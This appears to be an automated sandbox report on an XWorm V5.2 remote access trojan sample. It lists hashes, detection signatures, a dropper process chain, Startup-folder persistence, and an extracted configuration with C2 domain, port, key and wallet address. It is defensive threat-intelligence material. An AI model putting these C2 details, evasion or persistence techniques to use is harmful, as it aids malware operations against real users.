
Windows Analysis Report
x.exe

Overview

General Information

Sample name: x.exe
Analysis ID: 1504726
MD5: 98a2d7aee74efe11a83e1514199a1346
SHA1: 758365522b6a9eebe7ec5a10f4f260d3ffcd285a
SHA256: 0e079477b2c5072f876fabdd5339ce96ed42a55361fb445d1c9bbe1282bf4850
Tags: BudMyMenexe

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains suspicious base64 encoded strings
.NET source code contains very large strings
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Command shell drops VBS files
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Machine Learning detection for dropped file
Machine Learning detection for sample
Potential malicious VBS script found (has network functionality)
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • x.exe (PID: 5556 cmdline: "C:\Users\user\Desktop\x.exe" MD5: 98A2D7AEE74EFE11A83E1514199A1346)
    • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6496 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • findstr.exe (PID: 4368 cmdline: findstr /e "'v" "C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cscript.exe (PID: 1272 cmdline: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • x.exe (PID: 5808 cmdline: C:\Users\user\AppData\Local\Temp\x.exe MD5: 74D8F5A1E068A454FFAA5C8FD32A3E44)
        • WerFault.exe (PID: 2788 cmdline: C:\Windows\system32\WerFault.exe -u -p 5808 -s 2288 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
{"C2 url": ["127.0.0.1", "character-acquisitions.gl.at.ply.gg"], "Port": "36301", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source | Rule | Description | Author | Strings
C:\ProgramData\Hoodbyunlock.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\ProgramData\Hoodbyunlock.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\ProgramData\Hoodbyunlock.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xc6fc:$s6: VirtualBox
  • 0xc65a:$s8: Win32_ComputerSystem
  • 0xeeac:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xef49:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf05e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe2e0:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\x.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Local\Temp\x.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Source | Rule | Description | Author | Strings
00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xd58c:$s6: VirtualBox
  • 0xd4ea:$s8: Win32_ComputerSystem
  • 0xfd5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfdf9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xff0e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf190:$cnc4: POST / HTTP/1.1
00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xe67c:$s6: VirtualBox
  • 0xe5da:$s8: Win32_ComputerSystem
  • 0x10e2c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x10ec9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10fde:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10260:$cnc4: POST / HTTP/1.1
00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
Source | Rule | Description | Author | Strings
6.3.cscript.exe.2a3f8e09dd0.0.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
6.3.cscript.exe.2a3f8e09dd0.0.raw.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xc7bc:$s6: VirtualBox
  • 0xc71a:$s8: Win32_ComputerSystem
  • 0xef8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xf029:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf13e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe3c0:$cnc4: POST / HTTP/1.1
6.3.cscript.exe.2a3f8e09dd0.4.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
6.3.cscript.exe.2a3f8e09dd0.4.raw.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xc7bc:$s6: VirtualBox
  • 0xc71a:$s8: Win32_ComputerSystem
  • 0xef8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xf029:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf13e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe3c0:$cnc4: POST / HTTP/1.1
6.3.cscript.exe.2a3f8d843d0.2.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6496, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 1272, ProcessName: cscript.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6496, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 1272, ProcessName: cscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6496, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 1272, ProcessName: cscript.exe
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5808, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hoodbyunlock.lnk
Source: Process started; Author: Michael Haag; Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6496, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 1272, ProcessName: cscript.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-05T11:15:25.670475+0200 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49722 | 147.185.221.17 | 36301 | TCP


AV Detection

Source: x.exe; Avira: detected
Source: character-acquisitions.gl.at.ply.gg; Avira URL Cloud: Label: malware
Source: C:\ProgramData\Hoodbyunlock.exe; Avira: detection malicious, Label: TR/Agent.hcyxx
Source: C:\Users\user\AppData\Local\Temp\x.exe; Avira: detection malicious, Label: TR/Agent.hcyxx
Source: 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "character-acquisitions.gl.at.ply.gg"], "Port": "36301", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: character-acquisitions.gl.at.ply.gg; Virustotal: Detection: 10%
Source: C:\ProgramData\Hoodbyunlock.exe; ReversingLabs: Detection: 73%
Source: C:\ProgramData\Hoodbyunlock.exe; Virustotal: Detection: 77%
Source: C:\Users\user\AppData\Local\Temp\x.exe; ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\x.exe; Virustotal: Detection: 77%
Source: x.exe; ReversingLabs: Detection: 65%
Source: x.exe; Virustotal: Detection: 55%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\Hoodbyunlock.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\x.exe; Joe Sandbox ML: detected
Source: x.exe; Joe Sandbox ML: detected
Source: 7.2.x.exe.128a1a78.1.raw.unpack; String decryptor: 127.0.0.1,character-acquisitions.gl.at.ply.gg
Source: 7.2.x.exe.128a1a78.1.raw.unpack; String decryptor: 36301
Source: 7.2.x.exe.128a1a78.1.raw.unpack; String decryptor: <123456789>
Source: 7.2.x.exe.128a1a78.1.raw.unpack; String decryptor: <Xwormmm>
Source: 7.2.x.exe.128a1a78.1.raw.unpack; String decryptor: XWorm V5.2
Source: 7.2.x.exe.128a1a78.1.raw.unpack; String decryptor: USB.exe
Source: 7.2.x.exe.128a1a78.1.raw.unpack; String decryptor: %ProgramData%
Source: 7.2.x.exe.128a1a78.1.raw.unpack; String decryptor: Hoodbyunlock.exe
Source: 7.2.x.exe.128a1a78.1.raw.unpack; String decryptor: BTC_Address
Source: 7.2.x.exe.128a1a78.1.raw.unpack; String decryptor: 0x9eF91c246cC47EdFB8857bd1631c50A4D93c1aC6
Source: 7.2.x.exe.128a1a78.1.raw.unpack; String decryptor: TRC20_Address
Source: x.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: x.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: x.exe, 00000007.00000002.3111404709.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb` source: x.exe, 00000007.00000002.3111404709.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: lib.pdb source: x.exe, 00000007.00000002.3111404709.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Drawing.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.pdbL+ source: x.exe, 00000007.00000002.3113363388.000000001B807000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Xml.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: 0C:\Windows\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Core.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.pdb.> source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.pdb source: x.exe, 00000007.00000002.3113363388.000000001B750000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000007.00000002.3111404709.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, WER93E4.tmp.dmp.11.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: x.exe, 00000007.00000002.3113363388.000000001B7D3000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Drawing.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Management.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Management.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: x.exe, 00000007.00000002.3113363388.000000001B7D3000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.pdbH source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: indoC:\Windows\mscorlib.pdb source: x.exe, 00000007.00000002.3113829594.000000001BF88000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdb source: WER93E4.tmp.dmp.11.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER93E4.tmp.dmp.11.dr

Networking

Source: Network traffic; Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49722 -> 147.185.221.17:36301
Source: Malware configuration extractor; URLs: 127.0.0.1
Source: Malware configuration extractor; URLs: character-acquisitions.gl.at.ply.gg
Source: C:\Windows\System32\cmd.exe; Dropped file: b.SaveToFile p+"\x.exe",2'v
Source: Yara match; File source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.0.x.exe.560000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.x.exe.128a1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: C:\ProgramData\Hoodbyunlock.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED
Source: global traffic; TCP traffic: 192.168.2.5:49722 -> 147.185.221.17:36301
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 208.95.112.1
Source: Joe Sandbox View; IP Address: 147.185.221.17
Source: Joe Sandbox View; ASN Name: TUT-ASUS
Source: Joe Sandbox View; ASN Name: SALSGIVERUS
Source: unknown; DNS query: name: ip-api.com
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: ip-api.com
Source: global traffic; DNS traffic detected: DNS query: character-acquisitions.gl.at.ply.gg
Source: x.exe, 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com
Source: cscript.exe, 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, Hoodbyunlock.exe.7.dr, x.exe.6.dr; String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: x.exe, 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.11.dr; String found in binary or memory: http://upx.sf.net
Source: x.exe, 00000000.00000002.2152277122.0000000003071000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/dehoisted/Bat2Exe
Source: x.exe; String found in binary or memory: https://github.com/dehoisted/Bat2Exeg
Source: C:\Users\user\AppData\Local\Temp\x.exe; Window created: window name: CLIPBRDWNDCLASS

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\x.exe; Process information set: 01 00 00 00

System Summary

Source: 6.3.cscript.exe.2a3f8e09dd0.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.3.cscript.exe.2a3f8e09dd0.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.3.cscript.exe.2a3f936cf80.5.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.x.exe.128a1a78.1.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.3.cscript.exe.2a3f8d843d0.2.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.3.cscript.exe.2a3f8d843d0.3.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.0.x.exe.560000.0.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.3.cscript.exe.2a3f8e09dd0.0.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.x.exe.128a1a78.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.3.cscript.exe.2a3f8d843d0.1.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.3.cscript.exe.2a3f8e09dd0.4.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000003.2145801874.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\Hoodbyunlock.exe, type: DROPPED; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: x.exe, Program.cs; Base64 encoded string: System.Security.
Source: x.exe, Program.cs; Base64 encoded string: System.Net
Source: x.exe, Program.cs; Long String: Length: 345234
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 7_2_00007FF847021C11
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 7_2_00007FF847026B02
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 7_2_00007FF8470210FA
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 7_2_00007FF847025D56
Source: C:\Users\user\AppData\Local\Temp\x.exe; Code function: 7_2_00007FF847025859
Source: C:\Users\user\AppData\Local\Temp\x.exe; Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5808 -s 2288
Source: x.exe.6.dr; Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: Hoodbyunlock.exe.7.dr; Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: x.exe, 00000000.00000000.2075833267.0000000000D02000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenamemy men.exe4 vs x.exe
Source: x.exe, 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameHoodbyunlock.exe8 vs x.exe
Source: x.exe, 00000007.00000000.2151451555.0000000000574000.00000002.00000001.01000000.00000008.sdmp; Binary or memory string: OriginalFilenameHoodbyunlock.exe8 vs x.exe
Source: x.exe; Binary or memory string: OriginalFilenamemy men.exe4 vs x.exe
Source: x.exe.6.dr; Binary or memory string: OriginalFilenameHoodbyunlock.exe8 vs x.exe
Source: x.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 6.3.cscript.exe.2a3f8e09dd0.0.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.3.cscript.exe.2a3f8e09dd0.4.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
